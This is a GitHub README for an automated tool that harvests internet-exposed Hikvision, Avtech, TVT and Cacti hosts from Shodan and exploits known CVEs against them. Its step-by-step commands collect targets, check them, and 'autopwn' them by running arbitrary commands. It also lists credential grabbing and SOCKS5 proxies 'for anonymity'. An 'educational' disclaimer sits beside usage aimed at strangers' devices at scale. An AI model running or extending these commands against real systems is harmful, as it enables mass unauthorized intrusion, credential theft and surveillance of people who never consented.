https://github.com/TasosY2K/camera-exploit-tool

Automated exploit scanner for cameras on the internet

camera camera-exploitation camera-hacking exploit iot scanner shodan vulnerability


## Internet Camera Exploitation Tool

This tool is meant to assist cyber security researchers in discovering outdated and vulnerable camera systems on the internet by utilizing shodan.io.

I was able to discover thousands of vulnerable cameras using it.

![](/screenshots/Screenshot_20221216_015844.png)

![](/screenshots/Screenshot_20221216_021346.png)

![](/screenshots/Screenshot_20221216_023903.png)

## Vendors Affected

[+] Hikvision

[+] Avtech

[+] TVT

[+] Cacti

more to come...

## Features

- Fetching of hosts from shodan.io
- Check for vulnerable cameras
- Automatically run commands on exploited devices (Only Hikvision for now)
- Automatically grab camera credentials (Only for Avtech)
- Multi-threading for faster scanning
- Usage of Socks5 proxies for anonymity
- Storing results in Sqlite3 database
- Logging all actions in log files

## Prerequisites

To use this tool you need to have the following:
- Shodan API key (Membership required for more than 1 page)
- Socks5 authenticated proxies

## Installation

```
git clone https://github.com/TasosY2K/camera-exploit-tool
pip install -r requirements.txt
python3 scanner.py --help
```

## Usage

##### Collect hosts in database

```
# Collect Hikvision hosts
python3 scanner.py --shodan --api-token --query 'product:"Hikvision IP Camera"' --pages 1

# Collect Avtech hosts
python3 scanner.py --shodan --api-token --query 'linux upnp avtech' --pages 1

# Collect TVT hosts
python3 scanner.py --shodan --api-token --query 'product:"Cross Web Server"' --pages 1

# Collect Cacti hosts
python3 scanner.py --shodan --api-token --query 'Login to Cacti' --pages 1
```

##### Check hosts for exploit

```
python3 scanner.py --check --proxy-file proxies.txt --threads 20
```

##### Automatically run command on exploited hosts

```
python3 scanner.py --autopwn --proxy-file proxies.txt --payload "id"
```

## About this tool

This tool is purely educational and is intended to make the internet more secure.

**I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.**

Any PRs or suggestions on improving this project are welcome.

## Exploits Used
[https://www.exploit-db.com/exploits/40500](https://www.exploit-db.com/exploits/40500)

CVE-2021-36260 [https://www.exploit-db.com/exploits/50441](https://www.exploit-db.com/exploits/50441)

[https://github.com/k1p0d/h264_dvr_rce](https://github.com/k1p0d/h264_dvr_rce)

CVE-2022-46169 [https://github.com/sAsPeCt488/CVE-2022-46169](https://github.com/sAsPeCt488/CVE-2022-46169)